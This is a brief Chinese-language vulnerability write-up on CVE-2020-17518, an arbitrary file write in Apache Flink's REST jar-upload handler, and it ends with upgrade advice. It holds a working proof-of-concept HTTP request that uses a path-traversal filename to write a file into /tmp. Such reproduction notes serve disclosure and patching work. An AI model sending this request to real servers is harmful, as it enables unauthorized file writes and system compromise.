0x01 簡介
Apache Flink是一個開源流處理框架,具有強大的流處理和批處理功能。
Apache Flink 1.5.1引入了一個REST處理程序,允許您通過惡意修改的HTTP頭將上傳的文件寫入到本地文件系統上的任意位置。
0x02 漏洞編號
CVE-2020-17518
0x03 影響版本
Flink 1.5.1-1.11.2
0x04 漏洞復現
POC
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
查看服務器/tmp目錄下有文件被創建
0x05 修復建議
- 安全版本:
- Flink 1.11.3或Flink 1.12.0